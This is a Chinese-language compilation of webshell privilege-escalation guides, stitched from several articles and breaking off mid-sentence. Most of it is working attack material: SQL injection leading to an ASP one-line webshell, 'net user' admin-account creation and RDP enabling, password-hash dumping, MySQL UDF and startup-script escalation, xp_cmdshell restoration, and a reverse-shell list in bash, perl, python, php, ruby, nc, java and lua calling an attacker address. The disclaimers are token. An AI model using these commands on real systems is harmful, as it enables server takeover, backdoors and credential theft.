最全的WEBSHELL提权方法总结

MySQL提权之udf提权（获得webshell的情况）什么是udf提权？MySQL提供了⼀个让使⽤者⾃⾏添加新的函数的功能，这种⽤户⾃⾏扩展函数的功能就叫udf。

它的提权原理也⾮常简单！即是利⽤了root ⾼权限，创建带有调⽤cmd的函数的udf.dll动态链接库！这样⼀来我们就可以利⽤ system权限进⾏提权操作了！当我们拿到webshell后，由于中间件,例如，apache使⽤了较低的权限，可能仅仅是个⽹络服务的权限，然后我们就需要进⾏提权，⽽有时候⽬标机器补丁较全，各种系统提权姿势都失效的情况下，可以将⽬光转义到数据库服务上，在Windows下，在较低版本的mysql（<5.6）安装时默认是系统权限。

还有就是很多⼈图⽅便，例如使⽤了各种集成环境，未做安全设置，直接⽤⾼权限账户进⾏站点配置，就可以考虑⽤UDF进⾏提权。

dll⽂件的好处？1.扩展了应⽤程序的特性;2.可以⽤许多种编程语⾔来编写;3.简化了软件项⽬的管理;4.有助于节省内存;5.有助于资源共享;什么是udf库？UDF表⽰的是MySQL中的⽤户⾃定义函数。

这就像在DLL中编写⾃⼰的函数并在MySQL中调⽤它们⼀样。

我们将使⽤“lib_mysqludf_sys_64.dll”DLL 库不同版本的区别：MySql < 4.1:允许⽤户将任何的DLL⽂件⾥⾯的函数注册到MySql⾥。

MySql 4.1-5.0：对⽤来注册的DLL⽂件的位置进⾏了限制，通常我们选择 UDF导出到系统⽬录C:/windows/system32/来跳过限制。

MySql >=5.1:这些DLL只能被放在MySql的plugin⽬录下。

0x01 提权的前提1. 必须是root权限（主要是得创建和抛弃⾃定义函数）2. secure_file_priv=(未写路径)3. 将udf.dll⽂件上传到MySQL的plugin⽬录下（这⾥以MySQL>=5.1为例）0x02 开始提权这⾥以本地为例1.我们这⾥上传了⼀句话，然后⽤菜⼑连接上先判断数据库版本select version();符合MySql>=5.1的情况。

获取webshell后,上传一句话木马,通过中国菜刀连接启动3389服务,添加管理员账户,获取目标主机的权限获取webshell插入一句话木马的方法有很多,不一定是通过sql注入.从中国菜刀连接上靶机后,获取服务器权限的步骤方式都一样Setp 0实验环境操作机：Windows XP目标机：Windows server 2003实验工具：中国菜刀 Pr 御剑 Pangolin 3389本实验要求获取网站的服务器权限.Step 1目录扫描工具：御剑路径：C:\Tools\目录扫描\打开御剑,在域名中输入,开始扫描；在目录列表中查找后台,发现存在/admin双击打开后台登录页面不过用户名和密码都不知道,没关系,进行下一步：获取用户名和密码.Step 2工具：旁注WEB综合检测程序修正版路径：C:\Tools\注入工具\\打开工具,依次点击 SQL注入 -->批量扫描注入点 --> 添加网址 --> 批量分析注入点；出现下面这个对话框说明已经检测完毕；点击OK进行下一步；注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择检测注入；点击检测注入后,主界面从批量扫描注入点转到 SQL注入猜解检测,点击开始检测；检测完毕后,显示可以注入,并列出了数据库类型：Access 数据库；下面开始逐步猜解表名 -->猜解列名--> 猜解内容；点击猜解表名后,在数据库列表中会显示4个表,分别是admin、user、movie和news；选择admin表,点击猜解列名,成功猜解出三个列名id、username和password；勾选username和password,点击猜解内容,右侧列表中成功显示用户名admin,密码469e80d32c0559f8当然密码是MD5加密的,打开本机浏览器,输入,输入刚刚查询到的密文,点击解密；成功找到明文密码：admin888；注入的方法与工具很多,或者也可以这样：在浏览器中打开网站首页,在最新产品中随便选择一个打开注入点太多；复制URL ,使用工具：穿山甲工具：穿山甲Pangolin路径： C:\Tools\注入工具\pangolinPangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具.所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法；打开穿山甲,输入URL,点击绿色三角箭头进行注入操作；点击 Dates 切换到Dates选项卡,点击 Tables 成功猜解出4张表；获取内容的原理同Domain的使用方法一样,猜解表名-->猜解列名-->猜解内容；同样能获取用户名和密码；下一步：登录后台,上传木马；Setp 3打开后台登录页面,输入用户名admin,密码admin888,输入验证码,点击 ENTER 登录后台；久违的后台终于进去了….点击左侧菜单栏中的系统设置管理-->网站信息配置,用修改配置文件的方法获取WebShell；打开相应页面后,将公司名称内容修改为一句话木马"%><%Eval RequestChr35%><%'写一句话木马的时候注意闭合；点击最下面的保存设置按钮；如果插马成功,公司名称内容为空；打开中国菜刀连接一句话木马；工具：中国菜刀路径：C:\Tools\webshell\中国菜刀打开菜刀,右键空白处,选择添加；在地址栏中输入,为什么是这个路径因为我们刚才修改的网站信息配置页面,就是这个路径,可以自己下载一个魅力企业网站管理系统源码看看,2007或2009版的都行,里面的目录结构一目了然；连接密码为,密码为什么是往上看一句话木马,里面有个chr35,的ascii码就是35,当然这个密码可以随便设置,只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可,点击添加；添加成功后会新增一条记录；双击这个URL,成功进入解释一下一句话木马/inc/的源码是这样的：1.<%2.Const SiteName="魅力企业网站管理系统 2007 中英繁商业正式版" '网站名称3.Const EnSiteName="MSCOM 2007" '网站名称4.Const SiteTitle="魅力软件" '网站标题5.Const EnSiteTitle="MelyySoft" '网站标题6.Const SiteUrl="" '网站地址7.Const Miibeian="湘ICP备05011184号" '网站备案号8.….9.%>复制代码构造一句话木马：1."%><%Eval RequestChr35%><%'复制代码插入一句话木马后,代码会变成这样：1.<%2.Const SiteName=""%><%Eval RequestChr35%><%'" '网站名称3.Const EnSiteName="MSCOM 2007" '网站名称4.Const SiteTitle="魅力软件" '网站标题5.Const EnSiteTitle="MelyySoft" '网站标题6.Const SiteUrl="" '网站地址7.Const Miibeian="湘ICP备05011184号" '网站备案号8.….9.%>复制代码代码再整理规范一点就是这样：1.<%Const SiteName=""%>2.<%Eval RequestChr35%>3.<% '" '网站名称4.Const EnSiteName="MSCOM 2007" '网站名称5.Const SiteTitle="魅力软件" '网站标题6.Const EnSiteTitle="MelyySoft" '网站标题7.Const SiteUrl="" '网站地址8.Const Miibeian="湘ICP备05011184号" '网站备案号9.….10.%>复制代码所以插入一句话木马一定要保证整个代码的语法是正确的,否则肯定不成功；下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码；Step 4进入C:\RECYCLER目录,准备上传提权工具；当然可写的目录不知这一个,还有其他的；提权工具包括pr,3389,cmd,路径：C:\Tools\提权工具\windows开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传；上传成功；提权Windows跟踪注册表项的ACL权限提升漏洞KB952004MS09-012Windows管理规范WMI提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源.WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程.一旦找到了SYSTEM 令牌,就可以获得SYSTEM权限的提升.使用方法：1. "net user hacker 123 /add & net localgroupadministrators hacker /add"复制代码net user hacker 123 /add添加一个用户名为hacker、密码为123的账户；net localgroup administrators hacker /add将账户hacker添加到管理员组；提权有很多种,如巴西烤肉等；下一步,执行提权操作；右键,选择虚拟终端成功进入,将目录切换到C:\RECYCLER用执行cmd命令,添加账户；1.pr "net user hacker 123 /add"复制代码第一次执行命令有可能不成功,怎么办没关系,再执行一次就OK了；账户添加成功,下一步,将hacker账户添加到系统管理员组；1.pr "net localgroup administrators hacker/add"复制代码添加成功,下一步,开启3389；1.pr 3389复制代码如果出现如上图中的一大堆命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机；开始-->运行-->mstsc如果找不见目标IP地址,请点击右上角场景拓扑图进行查看：输入目标IP地址：,开始连接,继续输入用户名hacker和密码123,进入系统；3389连接成功下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 ,还是使用菜刀上传；工具一大堆,随便用,这里我们使用QuarksPwDum,开始上传；上传成功,进入目标机,运行QuarksPwDump注：打开cmd,用命令行启动QuarksPwDump,不要直接双击；运行后,会出现如下界面：继续输入命令：1.QuarksPwDump --dump-hash-local 复制代码执行后的结果如下：成功获取到administrator的hash：62C4700EBB05958F3832C92FC614B7D1:4D4541AACCF6CF33E1 DD9D85暂时切换出实验环境,在你的电脑上打开浏览器输入,在页面的相应位置输入hash,然后GO；ps：如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站点很多；最终结果输出：___________________________________________________ ___________________________________________________ _____________________________________WVSWVS Web Vulnerability Scanner 是一个自动化的Web应用程序安全测试工具.官网：1、WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序.2、它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序.3、除了自动化地扫描可以利用的漏洞,WVS还提供了分析现有通用产品和客户定制产品包括那些依赖于JavaScript的程序即AJAX应用程序的一个强健的解决方案.4、登录保护页面的自动扫描 .一个网站最有可能被攻击和容易受到攻击的区域往往是那些需要用户登录的区域.因此对的Acunetix最新版本现在可以自动地和轻松浏览复杂的验证区域,不再需要经常需要手动干预.这包括可以扫描使用单点登录SSO和基于OAuth认证的Web应用程序.5、检测WP核心和WP插件的漏洞. 可以检测超过1200个WordPress 核心和插件的漏洞,目前全球市场上没有其他扫描器可以检测这么多的WordPress漏洞.WordPress网站已经超过了7400万,在WordPress核心发现一个漏洞,或甚至在某一个插件的漏洞都可用于攻击数百万的个人网站.6、支持各种开发架构和Web服务 .许多企业级,任务关键的应用程序基本都是使用Java框架或Ruby on Rails建立的.第10版经过精心设计,可精确抓取扫描和使用这些技术构建的Web应用程序.另外随着不断上升的HTML5单页面的应用程序和移动应用,Web服务已经成为一个显着的攻击向量.新版本改进了对使用WSDL和WCF描述基于SOAP的Web 服务支持,使用WADL定义自动扫描RESTful Web服务.其“深度扫描”爬行引擎可以非常迅速的分析同时使用Java 框架和Ruby on Rails开发的Web应用程序.7、检测恶意软件和钓鱼网址 Acunetix WVS 10将附带一个URL的恶意软件检测服务,这是用来分析所有的扫描过程中找到的外部链接,针对不断更新的恶意软件和钓鱼网址数据库,这项恶意软件检测服务利用了谷歌和Yandex的安全浏览数据库.8、支持外部第三方工具.如Fiddler、Burp Suite和Selenium IDE,以加强业务逻辑测试和手动测试和自动化的工作流.界面：报告输出：本次实验到此结束。

本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。

因为发觉其危害过大，原文已经经过大量删减及修改，即使这样本文的危害性仍然很大，所以请大家不要对国内的站点做任何具有破坏性的操作。

考虑再三，偶还是决定发出来。

此招手段歹毒，利用范围广泛，可以说是只要是有sql注射漏洞的网站，只要运用此法99%可以拿到webshell甚至系统权限（不敢把话说满，呵呵，经本人数百次真实“实战演习”，基本上是100%可以拿到webshell 甚至系统权限）。

记得我在《MSSQL db_owner角色注入直接获得系统权限（续）》中写过一种利用xp_regwrite 来取得系统权限的方法：xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','xwq1','REG_SZ','net user xwq xwq /add'xp_regwrite HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','xwq2','REG_SZ','net localgroup administrators xwq /add'，只要让网站所在的服务器重起，就能得到系统权限。

经过本人的数百次的真实实验，这种方法不太实用，很容易引起网管的注意，再说ddos也是违法的事（偶可是好人啊），发动一场ddos要花费的大量的人力，物力（看你的肉鸡多少拉）。

所以不太可行（除非是你十分想要搞定的网站）。

呵呵，哆嗦拉那么多，你可能看的已经不耐烦拉，好，这就介绍我的三大必杀技之一————万能提权。

假如一个网站存在sql注射漏洞，如果这个网站是用固定服务器sysadmin权限的用户作的连接（呵呵，通俗点说就是sa，菜鸟可以这样认为)，呵呵，想要拿到一个webshell或者是系统权限可以说是易如反掌，轻而易举的事，据我所知，sysadmin权限要拿到webshell或者系统权限不下10种，呵呵，可能更多吧（偶只会10种），sysadmin怎么拿到webshell或者系统权限，我不想多说，想比大家都已经烂熟于心拉，可是要是一个网站是db_owner权限呢？你怎么办，你怎么拿系统权限，怎么拿webshell（没有上传漏洞和数据库备份等功能），大家可能回说backup a shell，我记得LCX也在《MSSQL db_owner角色注入直接获得系统权限》里说过拉“备份得到的shell只是理论化的东东，如果一个webshell有20mb的话，你还能用它吗？”呵呵，要是我告诉你db_owner拿到一个webshell或者是系统权限的方法和sysadmin权限的一样多，你回有什么反映，是不是觉得有点不可思议，或者又是我胡说呢？（不相信的朋友，下面的内容就不要看拉）呵呵，是不是看的心痒痒拉，迫不及待的想知道啊，好，我不在废话拉，这就把我的三大必杀技之一————万能提升权限方法告诉大家。

在webshell提权过程中使用MSSQL的SA账号来提升权限拿服务器是比较有效的方法，但是在我们得到SA账号的密码去执行系统命令的时候往往会遇到各类错误提示，无法正常执行系统命令。

很多菜鸟朋友们遇到类似的问题可能就会选择放弃，其实这类问题是很常见的，现在管理员安全意识有所提高，往往对SA账号做了限制，或者是对我们执行系统命令所需要的xp_cmdshell储存过程做了修改或者删除，这个xp_cmdshell就类似于我们的wscript.shell一样了，有时候遇到管理将该组件删除了的我们自己上传cmd也就不能执行了。

但是这类情况我们也可以突破的，下面给大家列出一些实用SA账号执行系统命令出现的各类错误以及修复办法。

针对各类错误我们的修复办法都是给服务器执行SQL命令进行修复，这类给服务器执行SQL 命令我们可以使用一款《SQL查询分析器修正分离版》的软件，远程连接服务器直接执行SQL命令，若服务器是内网环境下的话我们就需要使用webshell自带的功能给服务器执行SQL语句了。

错误1：Error Message:未能找到存储过程 'master..xp_cmdshell'。

修复办法：第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复：dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")错误2：拒绝访问。

修复办法：该类错误一般是在执行系统命令的时候出现，例如执行net user invader 123456 /add 时候发生，该错误是由于管理对net文件作了修改，这类我们可以使用net1，或者使用Dir net.exe /s /p命令查找net.exe的备份文件，找到位置再执行，例如net1 user invader 123456 /add或D:XXXnet.exe user invader 123456 /add。

webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本，通常用于攻击者在受害者的服务器上执行恶意操作。

MSF（Metasploit Framework）是一种流行的渗透测试工具，可以用于执行各种攻击和提权操作。

以下是使用MSF进行Webshell提权的一般步骤：
1. 获取Webshell：首先，攻击者需要将Webshell上传到受害者的服务器上。

这可以通过多种方式完成，例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。

2. 扫描目标：一旦Webshell上传成功，攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。

这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。

3. 执行攻击：一旦攻击者确定了潜在的提权机会，他们可以使用MSF的各种攻击模块来尝试提权。

这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。

4. 获取权限：如果攻击成功，攻击者将获得对目标服务器的权限。

这可能包括管理员权限或其他高权限。

需要注意的是，这些步骤只是一个一般性的概述，并且实际情况可能因目标系统和环境而异。

此外，使用这些技术进行非法活动是非法的，并且可能导致严重的法律后果。

因此，建议仅在合法和授权的情况下使用这些技术。

主讲：危险漫步信息安全系列讲座Webshell提权登陆服务器66 Webshell提权登陆服务器主讲：危险漫步6 Webshell是什么？webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。

黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

6 Webshell是什么？“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。

webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。

由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。

6 Webshell的作用是什么？webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

6 Webshell会被入侵者怎样利用？Webshell被入侵者利用，可以达到控制网站服务器的目的。

这些网页脚本常称为WEB脚本木马，比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。

6 Webshell长什么样子？是什么？l可能是这样...6 Webshell长什么样子？是什么？l也可能是这样...6 Webshell长什么样子？是什么？l还有可能是这样...6 Webshell提权能获得什么权限Webshell一般是WEB端的最高权限了，如果获得这个权限还不能满足你的需求，那么就需要进行提权了，今天的分享就是要把WEB权限提升至更高的权限，通过3389远程连接的方式登陆服务器。

6。

说到花了九牛二虎的力气获得了一个webshell，当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～嘻嘻～～好跟我来，看看有什么可以利用的来提升权限第一如果服务器上有装了pcanywhere服务端，管理员为了管理方便也给了我们方便，到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了第二有很多小黑问我这么把webshell的iis user权限提升一般服务器的管理都是本机设计完毕然后上传到空间里，那么就会用到ftp，服务器使用最多的就是servu那么我们就利用servu来提升权限通过servu提升权限需要servu安装目录可写～好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限然后去servu安装目录里把ServUDaemon.ini更换服务器上的。

用我新建的用户和密码连接～好的，还是连上了ftpftp>open ipConnected to ip.220 Serv-U FTP Server v5.0.0.4 for WinSock ready...User (ip:(none)): id //刚才添加的用户331 User name okay, please send complete E-mail address as password. Password:password //密码230 User logged in, proceed.ftp> cd winnt //进入win2k的winnt目录250 Directory changed to /WINNTftp>cd system32 //进入system32目录250 Directory changed to /WINNT/system32ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。

常见的提权方法1. 提权方法之一是利用弱密码。

当系统或应用程序使用弱密码进行身份验证时，攻击者可以使用字典攻击、暴力破解或社交工程等技术来猜解密码并获取管理员权限。

2. 通过漏洞利用来提权也是一种常见的方法。

攻击者可以利用系统、应用程序或服务的安全漏洞，通过代码注入、缓冲区溢出等技术来获取提权权限。

3. 通过系统配置错误来提权。

攻击者可以利用系统管理员在配置文件、访问控制列表或权限设置等方面的错误来获得更高的权限。

4. 利用恶意软件进行提权也是一种常见的方法。

攻击者可以通过植入恶意软件、后门程序或恶意脚本等方式，在受害者计算机上运行，并以管理员权限执行特定操作。

5. 通过内核提权也是一种常见的方法。

攻击者可以利用操作系统内核的漏洞，通过缓冲区溢出、内存损坏或环境变量篡改等技术来获取提权权限。

6. 利用特权升级工具进行提权是另一种常见的方法。

这些工具包括Metasploit、Backtrack、Kali Linux等，它们提供了各种漏洞利用和提权的功能。

7. 利用附加权限漏洞进行提权。

当系统或应用程序授予某些用户或组额外的特权时，攻击者可以利用这些漏洞来获取提权权限。

8. 通过利用网络服务进行提权。

一些网络服务存在软件或配置漏洞，攻击者可以通过这些漏洞利用来获取提权权限。

9. 利用操作系统的弱点进行提权。

操作系统中可能存在一些安全性较弱的功能或配置，攻击者可以利用这些弱点来获取管理员权限。

10. 攻击者还可以通过社交工程和伪造身份来获取提权权限。

他们可能通过欺骗或说服其他用户来获得管理员权限，或者利用钓鱼等技术获取管理员凭据。

提权以及反弹shell⼀些⽅法提权以及反弹shellnetcat反弹shellkali中使⽤nc(netcat)进⾏监听⽤法 : nv -lvvp 2333(端⼝号)靶机中使⽤ bash -c 'bash -i >&/dev/tcp/192.168.1.1/2333 0>&1' 同样可以写成⼀句话⽊马进⾏反弹shell。

命令提权1、使⽤suid提权，找到⼀个属于root的具有s权限的⽂件；s是提权符find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;例如：在DC-1中，⾸先touch新建⼀个⽂件，然后执⾏touch abcdfind abcd -exec whoami \;find / -name abcd -exec "/bin/sh" \; #分号需要转义，find以分号结尾具有提权功能的Linux可执⾏⽂件包括：nmapvimfindbashmorelessnanocppython反弹shell#!/usr/bin/pythonimport os,subprocess,sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("攻击机IP地址","攻击机监听端⼝"))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])其他⼀些⽅法#bash版本：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1#perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' #python版本：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'#php版本：php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'#ruby版本：ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'#nc版本：nc -e /bin/sh 10.0.0.1 1234rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fnc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999#java版本r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()#lualua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"git提权sudo -l 查看具有sudo执⾏权限的命令sudo git -p help或者 sudo git help config!/bin/bashzip提权touch exploitsudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"tar提权收集信息：内外⽹服务器系统和版本位数服务器的补丁情况服务器的安装软件情况服务器的防护软件情况端⼝情况⽀持脚本情况信息收集常⽤命令：Windows:ipconfig /allnet usernetstat -anoversysteminfotasklist /svctaskkill -PID pid号taskkill /im qq.exe /fnet user test 123456 /addnet localgroup administrators test /addwhoamiCMD⽆法执⾏1、防护软件拦截2、CMD被降权3、组件被删除找可读写⽬录上传cmd.exe，将执⾏的cmd.exe路径替换成上传的路径查找3389端⼝1、注册表读取2、⼯具扫描3、命令探针端⼝转发lcx⽹站服务器是内⽹IP：192.168.2.3外⽹服务器IP是：192.168.80.151在内⽹服务器上执⾏的lcx命令是：lcx.exe -slave 192.168.80.151 51 192.168.2.3 3389在外⽹服务器上执⾏的lcx命令是：lcx.exe -listen 51 3389数据库提权MSSQL提权：安装组件--->开启3389---->创建⽤户------>提升权限------>完成Mysql提权：1、udf提权获取到对⽅数据库⽤户root的账号密码查看⽹站源码⾥⾯数据库配置⽂件(common,config.php,common.inc.php,data)查看数据库的配置⽂件暴⼒破解、mysql密码破解、3306端⼝⼊侵udf提权原理：通过root权限导出udf.dll到系统⽬录下，可以通过udf.dll调⽤执⾏cmd导出到\lib/plugin\安装⽬录下create function cmdshell returns string soname 'udf.dll'select cmdshell('net user test 123456 /add');select cmdshell('net localgroup administrators test /add');drop function cmdshell //删除函数2、启动项提权1、查看我们进⼊数据库中有什么表show tables;默认情况下，test中没有任何表的存在关键部分：2、在test数据库下创建⼀个新的表create table a(cmd text);表名为a，字段名为cmd，为text⽂本3、在表中插⼊数据insert into a values ("set wshshell=createobject(""wscript.shell"")");insert into a values ("a=wshshell.run(""cmd.exe /c net user test 123456 /add"",0)");insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup Administrators test /add"",0)")双引号和括号以及后⾯的0⼀定要输⼊，⽤这三条命令建⽴⼀个vbs的脚本程序！4、查看数据表select * form a;5、输出表为⼀个vbs的脚本⽂件select * from a into outfile "c://开机菜单//启动//a.vbs";6、重启3、mof提权4、反连端⼝提权Windows提权:开启3389使⽤批处理⽂件开3389使⽤sql语句开3389使⽤exe开3389使⽤vb开3389使⽤wireshark或cain嗅探3389获取账号名和密码Linux提权：uname -r 查看内核版本信息找到对应版本的exp上传----编译---运⾏----ok。

最全Windows提权总结（建议收藏）当以低权⽤户进去⼀个陌⽣的windows机器后，⽆论是提权还是后续做什么，第⼀步肯定要尽可能的搜集信息。

知⼰知彼，才百战不殆。

常规信息搜集systeminfo 查询系统信息hostname 主机名net user 查看⽤户信息netstat -ano|find "3389" 查看服务pid号wmic os get caption 查看系统名wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息wmic product get name,version 查看当前安装程序wmic service list brief 查询本机服务wmic process list brief 查询本机进程net share 查看本机共享列表netsh firewall show config 查看防⽕墙配置常见的杀软如下：360sd.exe 360杀毒360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe ⾦⼭卫⼠SafeDogUpdateCenter.exe 安全狗McAfee McShield.exe McAfeeegui.exe NOD32AVP.exe 卡巴斯基avguard.exe ⼩红伞bdagent.exe BitDefender要搜集的信息⼤致如下⼏点：机器的系统及其版本机器的打补丁情况机器安装的服务机器的防⽕墙策略配置机器的防护软件情况提权简介提权可分为纵向提权与横向提权：纵向提权：低权限⾓⾊获得⾼权限⾓⾊的权限；横向提权：获取同级别⾓⾊的权限。

Windows常⽤的提权⽅法有：系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略⾸选项提权、WEB中间件漏洞提权、DLL劫持提权、滥⽤⾼危权限令牌提权、第三⽅软件/服务提权等1、系统内核溢出漏洞提权#⼿⼯查找补丁情况systeminfo查看补丁wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息#MSF后渗透扫描post/windows/gather/enum_patches利⽤（Vulmap、Wes、WindowsVulnScan）对⽐补丁进⽽进⾏提权2、at命令利⽤在Windows2000、Windows 2003、Windows XP 这三类系统中，我们可以使⽤at命令将权限提升⾄system权限。

WEBSHELL权限提升技巧WEBSHELL权限提升技巧c: d: e:.....C:\Documents and Settings\All Users\「开始」菜单\程序\看这⾥能不能跳转，我们从这⾥可以获取好多有⽤的信息⽐如Serv-U的路径，C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个⽬录，如果⾏那就最好了，直接下它的CIF⽂件，破解得到pcAnywhere密码，登陆c:\Program Files\serv-u\C:\WINNT\system32\config\下它的SAM，破解密码c:\winnt\system32\inetsrv\data\是erveryone 完全控制，很多时候没作限制，把提升权限的⼯具上传上去，然后执⾏c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\c:\winnt\system32\inetsrv\data\c:\Program Files\c:\Program Files\serv-u\C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器⽀持PHP）c:\PHP(如果服务器⽀持PHP）运⾏"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限还可以⽤这段代码试提升，好象不是很理想的如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写⼊bat，vbs等⽊马。

什么是DLL劫持DLL劫持在破解逆向程序时是常用的，我们同样可以用于Webshell提权。

●DLL劫持产生的原因●先来看一下，DLL劫持的原因。

1、Windows的DLL称为动态链接库，动态链接库技术的本质实际上是将可执行文件与库文件分离，DLL库文件通过导出表提供API接口，PE加载器通过exe文件的导入表加载相应的DLL，并根据exe文件中的INT查询DLL中的函数地址，同时写入IA T。

2、当PE加载器根据exe文件的导入表加载DLL文件时，它会按照程序的当前目录-->system32目录-->windows目录-->PA TH环境变量设置的目录来依次查找要加载的DLL文件。

因此，我们可以在伪造一个导入表同名的DLL文件，放置到exe文件的目录中，让PE加载器加载我们伪造的DLL文件，从而实现劫持。

3、DLL的转发器功能为我们提供了必要的条件，所谓DLL转发器功能是将对某个DLL文件的导出函数调用转到另一个DLL文件的导出函数中。

类似于下面的代码：★//xxx.dll#pragma comment(linker, "/EXPORT:MessageBoxA = user32.MessageBoxA")★即xxx.dll中有一个MessageBoxA导出函数，当调用xxx.dll中的MessageBoxA时，实际上调用的是user32.dll中的导出函数MessageBoxA。

如果我们伪造exe文件所加载DLL中的一个并将伪造的DLL文件放置在exe文件目录中，同时转发其所有的函数调用（转发到正常的系统DLL文件函数调用中），就可以做一些有意思的事情。

●实战●上面是理论，下面来实践一下，以Win2003为例，定位到Iexplore.exe的目录，随便建立一个文件命名为usp10.dll，然后运行iexplore.exe直接运行IE提示出错基本可以确定iexplore.exe加载usp10.dll，要确定一个可执行文件加载哪些DLL有时候单纯的查看导入表是不可取的，最好的办法用OD加载程序，ALT+L查看加载记录，如图2所示，但是需要注意一点，系统的一些关键DLL比如kernel32.dll、ntdll.dll无法劫持。

web提权方法
Web提权是指利用Web应用的安全漏洞，提升自己的权限，从而获得对系统的控制权。

以下是几种常见的Web提权方法：
1. 跨站脚本攻击（XSS）：攻击者在Web应用程序中注入恶意的HTML或JavaScript代码，当其他用户访问该页面时，代码会被执行，攻击者可以利用这个漏洞获取用户的敏感信息或者执行其他恶意操作。

通过XSS漏洞，
攻击者可以提升自己的权限，例如获取管理员的会话令牌、执行任意脚本等。

2. 服务器端请求伪造（SSRF）：Web应用程序中的服务器端请求伪造漏洞允许攻击者利用内部网络资源来访问敏感数据或执行恶意操作。

攻击者可以利用这个漏洞来获取服务器的内部IP地址、端口号等信息，进而提升自己
的权限。

3. 目录遍历漏洞：目录遍历漏洞是指攻击者通过在URL中输入特殊字符来
访问Web应用程序中不存在的目录或文件。

攻击者可以利用这个漏洞来获
